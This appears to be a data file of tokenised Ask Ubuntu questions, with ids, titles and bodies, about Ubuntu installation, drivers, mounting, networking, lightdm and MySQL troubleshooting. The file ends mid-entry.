346700	acpi=off needed when bios graphics mode is switchable	i just flashed my laptops bios to newest version and now i have the option to define how i 'd like to set my graphic mode . i have the option to check `` integrated '' and `` switchable '' . the difference seems to be using only internal gpu or both ( the dedicated nvidia optimus ) . if setting to integrated , i can boot ubuntu without acpi=off , but when setting to `` switchable '' i need to set acpi=off in grub options . my question is why or how is the acpi option related with the dedicated gpu ? i 'd like to use my laptop also for gaming so i 'm depending on `` switchable '' . how 's the name of the boot option to fix my gpu issue without completely disabling acpi ? since i have here a bunch of options but i do n't understand the differences due lack of knowledge .
346701	connect an external harddisk as readonly for data recovery	i need to use testdisk recovery program on my affected hardrive . so i want to mount the external harddisk as readonly in ubuntu . how can i connect my external harddisk as readonly to my ubuntu desktop so that i can run recovery softwares on it without affecting the data ?
346705	is there a way to create a cd with all my preset things ?	i have been using ubuntu and ubuntu based distros for quiet some time . however , every 2 or 3 months i reinstall ( mainly change the distro to another one to test it ) and i also install these systems on other laptops/pcs of friends . the time-consuming part is where i change every bit to recreate my own settings that i find perfect for daily use . ( meaning ... .icons , panels , conky , shortcuts , etc.. ) is there a way to create a live usb pendrive with all my own settings and install it from there ? saving the time of reconfiguring my system every time i install it on my computers of those of my friends ?
346706	print multiple lines starting with `` d '' after multiple greps	i have two text files . text-file-1 contains strings ( one string per line ) ; c 010 c 020 c 024 . . . text-file-2 contains data in following format ; c 005 carbon d carbon 1 d carbon 2 d carbon 3 d carbon 4 c 010 hydrogen d hydrogen 1 d hydrogen 2 c 017 oxygen d oxygen 1 c 020 nitrogen d nitrogen 1 d nitrogen 2 d nitrogen 3 c 024 sulphur d sulphur 1 d sulphur 2 . . . text-file-1 contains 30 lines but text-file-2 contain huge data , and in the same format as i mentioned . i can grep the text in text-file-2 found in text-file-1 using following command ; awk 'nr==fnr { a [ $ 2 ] =1 ; next } ; a [ $ 2 ] ' text-file-1 text-file-2 > filename output for this script c 010 hydrogen c 020 nitrogen c 024 sulphur . . . my desired output is ; c 010 hydrogen d hydrogen 1 d hydrogen 2 c 020 nitrogen d nitrogen 1 d nitrogen 2 d nitrogen 3 c 024 sulphur d sulphur 1 d sulphur 2 . . . now , i need an extension of this command , which could print all lines ( starting with `` d '' ) , including and after this line . all lines in text-file-2 are starting with a letter ( c or d ) . this letter is not useful for me , but i kept it . kindly help .
346709	installing ububtu 12.04 on dell inspiron n5110 already having 3 active partitions	the dell inspiron n5110 already has 3 active partitions - boot fat 32 ( 44 mb for dell diagnostic tools ) recovery ntfs ( 15 gb ) system ( 192 gb ) option 1 : -i can shrink the system volume and install ubuntu but i would like to have snap partition too which is not possible because of maximum limit of 4 active partitions . is it safe to copy recovery partition and then add the space to system . i can then shrink system to make 16 gb space . then make 6 gb swap and 10 gb for ununtu . option 2 : - use install ubuntu side by side option and let ubuntu decide ( i am bit wary to let ubuntu habdle this process ) also is it possible to install ubuntu in extended partition and then create a logical swap , is there any performance difference between logical and active swap ? install ubuntu side by side windows 7 - does this option create swap if yes then is it active or logical ?
346710	13.04 flickering cursor on cpu usage	i recently installed ubuntu 13.04 onto an acer aspire 4755g . when idle or under low stress , the mouse pointer is completely solid and fine , however when more things start happening , it begins to flicker wildly , sometimes to the point of disappearing for a while . for example , if i were to go to some web page , for the entire duration of the load , i would have no mouse , but once the page was loaded , it 'd be back . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 )
346711	installing ubuntu problem `` the partition assigned to starts at an offset ''	when i wanted to install ubuntu 13.04 on my laptop ( hp envy 17 ) i got this problem . please help me fix it . answer from sudo gdisk -l /dev/sda : gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . disk /dev/sda : 1953525168 sectors , 931.5 gib logical sector size : 512 bytes disk identifier ( guid ) : 58f18688-ca8f-4e96-ac22-95b762f30f18 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1953525134 partitions will be aligned on 2048-sector boundaries total free space is 3437 sectors ( 1.7 mib ) number start ( sector ) end ( sector ) size code name 1 2048 821247 400.0 mib 2700 basic data partition 2 821248 1353727 260.0 mib ef00 efi system partition 3 1353728 1615871 128.0 mib 0c01 microsoft reserved part 4 1615872 1895444479 903.0 gib 0700 basic data partition 5 1895444480 1953523711 27.7 gib 0700 basic data partition
346712	why can i not print to a network attached printer from ubuntu ?	i am using my rasberry pi as a print server using samba . i have followed this tutorial , but i can not print from my ubuntu laptop . i have added it as windows printer via samba . but i get the nt_status_access_denied error when i try to print . if i add credentials when i add the printer ( i use my raspberry pi username and password ( which should be added to the right group ) ) i get : `` not authorized , the password may be incorrect . '' i know i could just as well post this in a raspberry pi forum , but since the problem is only with linux/ubuntu i thought i would post it here ...
346715	mount sd memory card as read-write	whenever i insert my sd memory card via card reader slot or usb or via phone ( file manager ) , the card is mounted but it 's read only . not able to create new folder , delete folder or move/copy files from system to memory card . also i have tried by making changing in properties 'file access ' to 'read and write ' for the owner but nothing happens .
346716	understanding iptables	iptables -a input -m state -- state new -m tcp -p tcp -- dport 7000:7010 -j accept i trying to understand the -m state -- state new part . searching through the man pages and correct me if i am wrong the new meaning that the packet has started a new connection , or otherwise associated with a connection which has not seen packets in both directions -m = match -- state , where state is a comma separated list of the connection states to match . possible states are invalid meaning that the packet could not be identified for some reason which includes running out of memory and icmp errors which do n't correspond to any known connection , established meaning that the packet is associated with a connection which has seen packets in both directions , new meaning that the packet has started a new connection , or otherwise associated with a connection which as not seen packets in both directions , and related meaing that the packet is starting a new connection , but is associated with an existing connection , such as an ftp data transfer , or an icmp error . untracked meaning that the packet is not tracked at all , which happens if you use the notrack target in raw table . my question is : what is the difference between these two commands iptables -a input -m state -- state new -m tcp -p tcp -- dport 7000:7010 -j accept iptables -a input -p tcp -- dport 7000:7010 -j accept
346717	workspace switcher never activates	i see a workspace switcher icon on the unity dash bar . however , when i press it , workspace switcher never activates . nothing happens . i do n't remember disabling this feature ever . can anyone help ? ps . this is a switcher icon on dash bar i am talking about .
346723	downgrade to lts version , preserving /home partition : should i expect this to work ?	specifically , i 'm installing kubuntu 12.04 over 13.04 . and in fact i 've already done it , and it seems to have at least mostly worked , but i 'm wondering whether this one anomaly is likely to be attributable to the downgrade ; to wit : i have no window borders|decorations , but only wide , featureless , white -- -or sometimes black -- -margins around all my windows . none of the settings in system settings ( the window border and decorations options are in workspace appearance ) seem to have any effect . is this likely to be fixable , or should i cut my losses and reinstall ( formatting the /home partition and restoring any data with rsync ) ?
346726	startup disk creator fails to erase disk	before extracting an iso image onto a usb device using startup disk creator , when i try to erase the usb device using the same software , i always get the following error : i have tried to erase various usb devices without success , so i believe this is not a device-specific problem . i see that a bug on this has been filed on launchpad , though an alternative/solution/word-around has not been suggested . is there a way to solve this error , without using other softwares to erase disk ? system specifications : ubuntu 12.10 startup disk creator 0.2.4
346729	is there a way to get a separate desktop for each user logged in through vnc ?	hi i am accessing my desktop remotely through vnc server/client connection . i used vino to establish a remote connection . now the app which i am building requires provision of a different section in which number of users can log in the machine at the same time . also each of the users should have a fresh instance . is there any existing application that serves the purpose or should i make the users login through different ports of vnc ( like 5900 for first user and 5901 for next n so on ) ?
346730	from where should i learn about functionality of maven package	i am working on a project which works through maven package is there any documentation available for maven package linux so that i can learn it in best way .. thanks
346733	i ca n't figure out how to start	ok . so , i downloade ubuntu , but now i do n't know how to create a usb so i can stick it in my dos laptop for installation . it downloaded in a compressed file . i have disk , boot , casper , dists , install , isolinux , pics , pool , pressed , autorun . i clicked in all of them and i 'm not sure what to do . i downloaded the 12.04 lts
346738	( 13.04 ) lightdm crashing - black screen flashing cursor	i am using the 13.04 x64 release of ubuntu on my pc and at least it works so far as it should . but suddenly the lightdm crashes during boot and even if i try to start it manually from terminal after switching to another tty . i do n't know what may cause the problems because i did n't even install any graphics-drivers for my nvidia card ( because i just know those problems since years and skip those problems by not installing any of them ) . it worked fine for some days after fresh install and updates , but now it just does not what it should . switching to gdm did solve the problem logging in to my computer with a gui but hell this lightdm should work i guess.. the logs are n't pretty much of help for me but maybe someone know what 's up ? lightdm.log [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.6.0 , uid=0 pid=7369 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.00s ] debug : using vt 7 [ +0.00s ] debug : activating vt 7 [ +0.01s ] debug : logging to /var/log/lightdm/x-1.log [ +0.01s ] debug : writing x server authority to /var/run/lightdm/root/:1 [ +0.01s ] debug : launching x server [ +0.01s ] debug : launching process 7376 : /usr/bin/x :1 -core -auth /var/run/lightdm/root/:1 -nolisten tcp vt7 -novtswitch [ +0.01s ] debug : waiting for ready signal from x server :1 [ +0.01s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.01s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.61s ] debug : got signal 10 from process 7376 [ +0.61s ] debug : got signal from x server :1 [ +0.61s ] debug : connecting to xserver :1 [ +0.61s ] debug : starting greeter [ +0.62s ] debug : started session 7385 with service 'lightdm-greeter ' , username 'lightdm ' [ +0.64s ] debug : session 7385 authentication complete with return value 0 : success [ +0.64s ] debug : greeter authorized [ +0.64s ] debug : logging to /var/log/lightdm/x-1-greeter.log [ +0.64s ] debug : session 7385 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +0.68s ] debug : greeter closed communication channel [ +0.68s ] debug : session 7385 exited with return value 1 [ +0.68s ] debug : greeter quit [ +0.68s ] debug : failed to start greeter [ +0.68s ] debug : stopping display [ +0.68s ] debug : sending signal 15 to process 7376 [ +0.82s ] debug : process 7376 exited with return value 0 [ +0.82s ] debug : x server stopped [ +0.82s ] debug : removing x server authority /var/run/lightdm/root/:1 [ +0.82s ] debug : releasing vt 7 [ +0.82s ] debug : display server stopped [ +0.82s ] debug : stopping seat , failed to start a display [ +0.82s ] debug : stopping seat [ +0.82s ] debug : seat stopped [ +0.82s ] debug : required seat has stopped [ +0.82s ] debug : stopping display manager [ +0.82s ] debug : display manager stopped [ +0.82s ] debug : stopping daemon [ +0.82s ] debug : exiting with return value 1 -- - x-0-greeter.log error writing x authority : failed to write x authority /var/lib/lightdm/.xauthority : success -- - x-1-greeter.log error writing x authority : failed to write x authority /var/lib/lightdm/.xauthority : success /var/log/lightdm/x-1-greeter.log ( end ) -- - x0.log x.org x server 1.13.3 release date : 2013-03-07 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux stefan-dev 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.8.0-30-generic root=uuid=6e9c6967-a55f-49b8-b690-7257b359ae8d ro quiet splash vt.handoff=7 build date : 17 april 2013 10:43:13pm xorg-server 2:1.13.3-0ubuntu6 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.28.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue sep 17 18:27:30 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' initializing built-in extension generic event extension initializing built-in extension shape initializing built-in extension mit-shm initializing built-in extension xinputextension initializing built-in extension xtest initializing built-in extension big-requests initializing built-in extension sync initializing built-in extension xkeyboard initializing built-in extension xc-misc initializing built-in extension security initializing built-in extension xinerama initializing built-in extension xfixes initializing built-in extension render initializing built-in extension randr initializing built-in extension composite initializing built-in extension damage initializing built-in extension mit-screen-saver initializing built-in extension double-buffer initializing built-in extension record initializing built-in extension dpms initializing built-in extension x-resource initializing built-in extension xvideo initializing built-in extension xvideo-motioncompensation initializing built-in extension selinux initializing built-in extension xfree86-vidmodeextension initializing built-in extension xfree86-dga initializing built-in extension xfree86-dri initializing built-in extension dri2 loading extension glx resize called 1680 1050 server terminated successfully ( 0 ) . closing log file .
346740	`make install` fails apparently due to typo , but not in makefile : how to find and fix ?	i 'm trying to install the fujitsu-usb-touchscreen drivers from here , on kubuntu 12.04 on my new fujitsu lifebook p1630 . ( see fujitsu-usb-touchscreen on kubuntu 13.04 ( 64-bit ) on p1630 : `make` errors . ) i downloaded the .zip file , unzipped it , and ran make in the directory thus created ; this all worked as expected . however , when i run sudo checkinstall ( which invokes make install ) , things go less well . on the first attempt the installation aborted with the following error : make : execvp : /etc/init.d/fujitsu_touchscreen : permission denied make : *** [ install ] error 127 i eventually resolved this by $ sudo chmod +x /etc/init.d/fujitsu_touchscreen but although a second sudo checkinstall then does not give the execvp error , it still fails at a later stage , and the log ( on stdout ) shows this dpkg error : dpkg : error processing /home/archelon/fujitsu-touchscreen-driver/cybergene-fujitsu-usb-touchscreen-112fdb75b406/cybergene-fujitsu-usb-touchscreen-112fdb75b406_amd64.deb ( -- install ) : unable to create `/sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy.dpkg-new ' ( while processing `/sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy ' ) : no such file or directory and , indeed , there is no /sys/module/fujitsu/usb/touchscreen/parameters/touch_maxy ; there is , however , /sys/module/fujitsu_usb_touchscreen/parameters/touch_maxy , and this is presumably what was intended . but this incorrect filename does not appear in the makefile or any other file in the directory , at least not that i can find . nor does it appear , as i discovered after running sudo checkinstall -- install=no as suggested below , in the .deb package created by checkinstall . where might such a typographical error be originating , and how would i go about fixing it ? edited to add : i 'm viewing the contents of the .deb file with ark , kubuntu 's default tool . it contains only three files : control.tar.gz , data.tar.gz , and debian-binary . data.tar.gz contains the directory tree that appears to match up to the usual root filesystem , with /etc , /lib , /sys , and /usr directories . ( looking at other .deb files on my system , this structure appears to be typical . ) here 's a screenshot : . ( full size . ) here 's another screenshot showing that control.tar.gz contains three files , one of which is empty : . ( full size . ) here 's the actual .deb file : https : //www.dropbox.com/s/odwxxez0fhyvg7a/cybergene-fujitsu-usb-touchscreen_112fdb75b406-1_amd64.deb edited 2013-09-28 to add : after reinstalling kubuntu 12.04 again , this time recreating the /home partition ( which , again , had been generated during an install of 13.04 ) , i can no longer reproduce this error . i am still curious to know how the underscores got changed to slashes , but it looks as though nobody has any idea . it is perhaps also of interest to note that while i have still not successfully run checkinstall against this package , i have done make install ; it requires the executabilization of /etc/init.d/fujitsu_touchscreen and the installation of hal , and the gui freezes shortly after installation completes , and there is no particular new functionality afterwards that i have noticed , and the system can no longer resume from being suspended ; however , this will be pursued elsewhere .
346743	laptop charger not recognised properly on samsung np900x3f	firstly thanks for your time . secondly , having an issue with my power charger on my samsung series 9 np900x3f . when i boot into ubuntu with the charger plugged in it recognises it as charging . when i unplug the charger after this it is still says it is charging . if i suspend in ubuntu then plug/unplug during this suspended state it recognises it , but not during normal running . if i knew a little more i 'm sure i could grab logs and find out what the difference between wake on suspend and normal running is , but alas i need help ! i also am having issues with my keyboard backlight via the fn keys , but that i care about far less . thank you very much . linux mikey-900x3f 3.12.0-031200rc1-generic # 201309161735 smp mon sep 16 21:38:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux ( i upgraded my kernel version to remove heinous horizontal artefacts i was getting ) happy to list more info about my system , ima bit of a noob . i did try searching however i ca n't find any questions at all about my system or related models with the same issue .
346744	i just purchased microserver n54l , how to install ?	it has following configuration ( all brand new ) hd : 3t sg sata 6g/7200/64m sound card asus xonar dg ati , video card with hdmi has anyone provide details how to install , what version and procedure so all driver are installed and working correctly for use to connects to 42 '' tv ? i have limited experience in ubuntu , which version i should avoid ? why i should use version 12 than 13 ?
346745	why does my liveusb not work ?	i 'm trying to get a dual boot win8 and ubuntu on my asus vivobook . i have disabled fastboot , i disabled faststartup . i have set the boot sequence in the correct order ( and that works ) i have have created a liveusb both with linuxlive usb creator and universal usb creator . i have tried ubuntu 12.04 lts and ubuntu 13.04 . i got to the grub , but when i click `` try ubuntu '' , `` install ubuntu '' or `` check disk for errors '' , my screen turns black the usb flickers for 2 seconds and then nothing . no hard drive action , no usb action nothing ( waited for about 10 minutes ) .
346746	grub rescue after following last post error file system unknown	ok i really did it now i ca n't login it keeps saying file unknown i do n't have cdor usb . i type ls an i ge hd0 hd0 msdos5 hd0 mosdos5 . ideas ? can i download ubuntu threw my cell ?
346748	how to create user with sudo privileges from shell script ?	i am writing a shell script that will create a user that i will use for deployments . i want to add that user to be able to use sudo without a password . how can i create this user from a shell script or from the command line ? this is what i have so far ( this script is run as the root user ) : # create user useradd deploy -m -s /bin/bash # copy authorized keys mkdir -p /home/deploy/.ssh cat ~/.ssh/authorized_keys > /home/deploy/.ssh/authorized_keys chown -r deploy : deploy /home/deploy/.ssh
346749	how do i turn off notifications when icq user comes online ?	i have added my icq account to online accounts and i now get notified whenever any of my contacts comes online . how can i turn it off ? ubuntu 13.04 64 bit .
346750	delete one of two folders with the same name by command line	i want to delete one of two folders which is having exactly same name but containing different files in it . how can i delete specific folder from these two in terminal ?
346751	nfs mount failes on startup	after updating to kubuntu 13.10 ( beta ) my nfs share stopped auto-mounting during boot . here is my fstab : dimanne @ impedance : ~ $ cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=328a9124-e5ff-4c13-a7e2-559ee6a20292 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=b3a4a4a4-c563-45c1-9d6b-602b07d66c70 none swap sw 0 0 # was on /dev/sdb1 uuid=9383ee42-aea8-4098-9533-08d1b9b04e59 /mnt/backup ext4 defaults 0 2 # was on /dev/sdc1 uuid=4ad4e84a-1e0e-4cb6-a63a-753d3ffc9ff2 /mnt/freedata ext4 defaults 0 2 server : /mnt/media /mnt/media nfs4 defaults /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 also i noticed suspicious messages in dmesg : dimanne @ impedance : ~ $ dmesg | grep killed [ 23.436063 ] init : idmapd-mounting ( /mnt/media ) main process ( 455 ) killed by term signal [ 26.828198 ] init : failsafe main process ( 1119 ) killed by term signal [ 28.352642 ] init : kdm main process ( 1757 ) killed by term signal however if i mount nfs share manually ( sudo mount -vvv server : /mnt/media /mnt/media ) all works perfectly , but at this time i get these messages in dmesg [ 458.804009 ] nfs : registering the id_resolver key type [ 458.804024 ] key type id_resolver registered [ 458.804026 ] key type id_legacy registered [ 473.827828 ] rpc : auth_gss upcall timed out . [ 473.827828 ] please check user daemon is running . what is the problem , how can i fix it ? p.s . i have read this nfs mount fails on startup but there is no solution ...
346753	12.04 64bit crashing on old hpdv5000	as stated in title i have an old hp dv5000 laptop ( amd 64bit ) . i have it set up as a dual boot winxp media center which runs fine , and have used macpup off a cd - running in ram - no problem . i have successfully set up a desktop with the same configuration ( but a much newer - though still older system ) . problem : i have tried to install 3 times and the installation is just unstable . as soon as i run an app - or try to install software the system crashes - black screen with text . i started running memtest86+ from the hard drive , and got errors in the second , third and fifth tests but had to use the system so stopped and rebooted into windows . can this be bad ram ? - but then why does windows work fine , and running macpup in ram works fine ? is the ubuntu too much for this old system ? i will go back and run memory tests with memtest86+ and the old windows memory test software - but in mean time - i had the chance - between freelance jobs to ask this . any help would be greatly appreciated . one more note : i am only techie enough to keep my computer systems working and upgrading as needed to do my freelancing . mostly use windows , but have in past used mac . i like linux and really like ubuntu - so was hoping to get this working on the old laptop .
346758	font stuck in wingdings	hello ubuntu community , my son inadvertently changed the computer font to wingdings and now we can not figure out how to get back a readable font . all we see are the symbols . any suggestions ? ?
346761	how can i fix a broken screenshot tool without restarting the system ?	sometimes my standard screenshot making tool breaks down and starts to make all screenshots pitch black . rebooting or restarting x fixes the problem , but in most cases the bug that i wanted to get make a screenshot of , goes away too . ubuntu 13.04 64-bit .
346764	jailkit & matlab	i have created a user restricted to a directory with jailkit . i would like to add matlab as one of the applications that the jailed user could use via ssh connection . how to do that ?
346767	no wifi connection dell5420 on ubuntu 12.10	cant connect to wifi actually wifi is always disconnected . it could n't even find any network . i tried to install the boardcom driver but it gives me a error and asks me to check the log file ... here is the log file so please can anybody give me a solution . 2013-09-17 20:04:17,178 debug : nvidia ( nvidia_319 ) .enabled ( ) : target_alt /usr/lib/nvidia-319/ld.so.conf current_alt /usr/lib/nvidia-319-updates/ld.so.conf other target alt /usr/lib/nvidia-319/alt_ld.so.conf other current alt /usr/lib/nvidia-319-updates/alt_ld.so.conf 2013-09-17 20:04:17,178 debug : nvidia_319 is not the alternative in use 2013-09-17 20:04:17,276 debug : nvidia ( nvidia_319_updates ) .enabled ( ) : target_alt /usr/lib/nvidia-319-updates/ld.so.conf current_alt /usr/lib/nvidia-319-updates/ld.so.conf other target alt /usr/lib/nvidia-319-updates/alt_ld.so.conf other current alt /usr/lib/nvidia-319-updates/alt_ld.so.conf 2013-09-17 20:04:17,333 debug : kmh enabled : true 2013-09-17 20:04:17,464 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-09-17 20:04:17,493 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-09-17 20:04:17,583 debug : nvidia ( nvidia_319 ) .enabled ( ) : target_alt /usr/lib/nvidia-319/ld.so.conf current_alt /usr/lib/nvidia-319-updates/ld.so.conf other target alt /usr/lib/nvidia-319/alt_ld.so.conf other current alt /usr/lib/nvidia-319-updates/alt_ld.so.conf 2013-09-17 20:04:17,584 debug : nvidia_319 is not the alternative in use 2013-09-17 20:04:17,682 debug : nvidia ( nvidia_319_updates ) .enabled ( ) : target_alt /usr/lib/nvidia-319-updates/ld.so.conf current_alt /usr/lib/nvidia-319-updates/ld.so.conf other target alt /usr/lib/nvidia-319-updates/alt_ld.so.conf other current alt /usr/lib/nvidia-319-updates/alt_ld.so.conf 2013-09-17 20:04:17,734 debug : kmh enabled : true
346769	multiples entries for windows ( uefi ) in the grub list , which one is the good ?	i just tried to install ubuntu on my asus x550c , and this is the first time i 've had to deal with efi and stuff . now , my computer does launch on grub , but i have like 10 names for windows ( efi , launcher , recovery etc ... ) and i 'd just like to know which one i need to use to run windows . additonal info if you need it : http : //paste.ubuntu.com/6120471/
346770	how do i use maas custom commissioning scripts ?	i am attempting to use a custom maas commissioning script to perform custom operations on my maas cluster . when do these scripts run ? how should they be named ? do they need to be in a particular format , or can they be executable shell scripts or binaries ?
346774	enable parental control by restricting some web access	my sister has got a new computer and i would like to restrict her accessing unnecessary websites . in my opinion a white-list for websites and ports ( maybe some special ports for games or voice server ) is the best way . what would be the best solution to achieve this ?
346775	display resolution on 10.04/12.04/13.04	is there a 'fix ' to the display > resolution problem on ubuntu 10.04/12.04/13.04 on some machines . my dell-vostro 200 screen needs a resolution of 1280x1024 , with any ubuntu installation i have tried it 's not there on 12.04 there is only 1024x768 and 800x600 on offer . on the 10.04 there was an 1170aprox by whatever/something . the resolution is perfect on virtual ... but then there are other problems . i deleted it . please help !
346776	unable to install python-qt4	i am trying to install python-qt4 i am getting following errors in ubuntu 12.04 user @ ubuntu : ~ $ sudo aptitude install python-qt4 [ sudo ] password for user : the following new packages will be installed : libqt4-designer { ab } libqt4-help { ab } libqt4-scripttools { ab } libqt4-test { ab } libqtassistantclient4 { a } libqtwebkit4 { a } python-qt4 python-sip { a } 0 packages upgraded , 8 newly installed , 0 to remove and 1 not upgraded . need to get 13.5 mb of archives . after unpacking 54.7 mb will be used . the following packages have unmet dependencies : libqt4-test : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . libqt4-designer : depends : libqt4-script ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqt4-xml ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtcore4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtgui4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . libqt4-help : depends : libqt4-network ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqt4-sql ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtcore4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtgui4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . libqt4-scripttools : depends : libqt4-script ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtcore4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . depends : libqtgui4 ( = 4:4.8.1-0ubuntu4 ) but 4:4.8.1-0ubuntu4.3 is installed . internal error : the solver install ( qdbus : i386 4:4.8.1-0ubuntu4 < libqt4-dbus : amd64 4:4.8.1-0ubuntu4 -s > { qdbus : amd64 4:4.8.1-0ubuntu4 qdbus : i386 4:4.8.1-0ubuntu4 } > ) of a supposedly unresolved dependency is already installed in step 43 internal error : the solver install ( qdbus : i386 4:4.8.1-0ubuntu4 < libqt4-dbus : amd64 4:4.8.1-0ubuntu4 -s > { qdbus : amd64 4:4.8.1-0ubuntu4 qdbus : i386 4:4.8.1-0ubuntu4 } > ) of a supposedly unresolved dependency is already installed in step 50 internal error : the solver install ( unixodbc : i386 2.2.14p2-5ubuntu3 < libqt4-sql-odbc : amd64 4:4.8.1-0ubuntu4 - > { libodbc1 : amd64 2.2.14p2-5ubuntu3 unixodbc : amd64 2.2.14p2-5ubuntu3 unixodbc : i386 2.2.14p2-5ubuntu3 } > ) of a supposedly unresolved dependency is already installed in step 72 internal error : the solver install ( qdbus : i386 4:4.8.1-0ubuntu4 < libqt4-dbus : amd64 4:4.8.1-0ubuntu4 -s > { qdbus : amd64 4:4.8.1-0ubuntu4 qdbus : i386 4:4.8.1-0ubuntu4 } > ) of a supposedly unresolved dependency is already installed in step 74 internal error : the solver install ( unixodbc : i386 2.2.14p2-5ubuntu3 < libqt4-sql-odbc : amd64 4:4.8.1-0ubuntu4 - > { libodbc1 : amd64 2.2.14p2-5ubuntu3 unixodbc : amd64 2.2.14p2-5ubuntu3 unixodbc : i386 2.2.14p2-5ubuntu3 } > ) of a supposedly unresolved dependency is already installed in step 82 internal error : the solver install ( libc-bin : amd64 2.15-0ubuntu10 < libc6 : i386 2.15-0ubuntu10 - > { libc-bin : amd64 2.15-0ubuntu10 libc-bin : i386 2.15-0ubuntu10 } > ) of a supposedly unresolved dependency is already installed in step 127 internal error : the solver install ( unixodbc : i386 2.2.14p2-5ubuntu3 < libqt4-sql-odbc : amd64 4:4.8.1-0ubuntu4 - > { libodbc1 : amd64 2.2.14p2-5ubuntu3 unixodbc : amd64 2.2.14p2-5ubuntu3 unixodbc : i386 2.2.14p2-5ubuntu3 } > ) of a supposedly unresolved dependency is already installed in step 138 the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libqt4-designer [ not installed ] 2 ) libqt4-help [ not installed ] 3 ) libqt4-scripttools [ not installed ] 4 ) libqt4-test [ not installed ] 5 ) python-qt4 [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 1 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used .
346780	infiniband + maas ?	i 'm looking at setting up an hpc based on mellanox infiniband rather than ethernet . because i have many nodes to manage , i was looking at trying something new , like maas . i know infiniband cards support pxe through the flexboot system , but what other obstacles might i face ? thanks for your advice .
346781	ca n't start mysql service anymore	i had mysql running ... with many different databases . i install mysql workbench today.. and was able to create any entity relationship diagram etc . then i decided to increase the size of my max_allowed_packet setting and restart the service . unfortunately , the service would n't restart . i checked my syslog and i 'm getting the following errors : sep 17 14:48:30 dev kernel : [ 456044.062568 ] init : mysql main process ( 8723 ) terminated with status 1 sep 17 14:48:30 dev kernel : [ 456044.062606 ] init : mysql main process ended , respawning sep 17 14:48:31 dev kernel : [ 456045.071308 ] init : mysql post-start process ( 8724 ) terminated with status 1 sep 17 14:48:31 dev kernel : [ 456045.080818 ] type=1400 audit ( 1379443711.030:42 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=8749 comm= '' apparmor_parser '' sep 17 14:48:31 dev kernel : [ 456045.094878 ] init : mysql main process ( 8753 ) terminated with status 1 sep 17 14:48:31 dev kernel : [ 456045.094911 ] init : mysql main process ended , respawning sep 17 14:48:32 dev kernel : [ 456046.103060 ] init : mysql post-start process ( 8754 ) terminated with status 1 sep 17 14:48:32 dev kernel : [ 456046.112910 ] type=1400 audit ( 1379443712.062:43 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=8777 comm= '' apparmor_parser '' sep 17 14:48:32 dev kernel : [ 456046.128208 ] init : mysql main process ( 8781 ) terminated with status 1 sep 17 14:48:32 dev kernel : [ 456046.128240 ] init : mysql respawning too fast , stopped i found another post on this site with a similar question and it suggested running dpkg-reconfigure . here 's the results : jm @ dev : /var/log $ sudo dpkg-reconfigure mysql-server-5.5 [ sudo ] password for jm : warning : world-writable config file '/etc/mysql/my.cnf ' is ignored 130917 